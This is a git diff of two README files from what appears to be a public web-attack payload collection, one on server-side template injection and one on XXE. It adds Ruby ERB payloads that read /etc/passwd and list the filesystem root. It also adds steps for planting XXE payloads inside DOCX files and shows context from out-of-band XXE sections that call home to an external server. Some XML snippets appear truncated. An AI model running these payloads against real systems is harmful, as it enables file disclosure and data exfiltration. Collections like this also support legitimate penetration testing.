diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index 7a43ed5..153b320 100644
--- a/Server Side Template injections/README.md
+++ b/Server Side Template injections/README.md
@@ -15,16 +15,22 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
### Basic injection
-```python
+```ruby
<%= 7 * 7 %>
```
### Retrieve /etc/passwd
-```python
+```ruby
<%= File.open('/etc/passwd').read %>
```
+### List files and directories
+
+```ruby
+<%= Dir.entries('/') %>
+```
+
## Java
### Java - Basic injection
@@ -228,4 +234,5 @@ $eval('1+1')
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
-* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
\ No newline at end of file
+* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
+* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
\ No newline at end of file
diff --git a/XXE injection/README.md b/XXE injection/README.md
index a1cb8c3..8079471 100644
--- a/XXE injection/README.md
+++ b/XXE injection/README.md
@@ -101,9 +101,9 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
-## Blind XXE
+## Blind XXE - Out of Band
-Blind XXE
+### Blind XXE
```xml
@@ -116,7 +116,7 @@ Blind XXE
&callhome;
```
-XXE OOB Attack (Yunusov, 2013)
+### XXE OOB Attack (Yunusov, 2013)
```xml
@@ -129,7 +129,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
%all;
```
-XXE OOB with DTD and PHP filter
+### XXE OOB with DTD and PHP filter
```xml
@@ -146,15 +146,42 @@ File stored on http://127.0.0.1/dtd.xml
">
```
-XXE Inside SOAP
+### XXE Inside SOAP
```xml
%dtd;]>]]>
```
+### XXE Inside DOCX file
+
+Format of an Open XML file (inject the payload in any .xml file):
+
+- /_rels/.rels
+- [Content_Types].xml
+- Default Main Document Part
+ - /word/document.xml
+ - /ppt/presentation.xml
+ - /xl/workbook.xml
+
+Then update the file `zip -u xxe.docx [Content_Types].xml`
+
+Tool : https://github.com/BuffaloWill/oxml_xxe
+
+```xml
+DOCX/XLSX/PPTX
+ODT/ODG/ODP/ODS
+SVG
+XML
+PDF (experimental)
+JPG (experimental)
+GIF (experimental)
+```
+
## Thanks to
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
+* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
+* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
\ No newline at end of file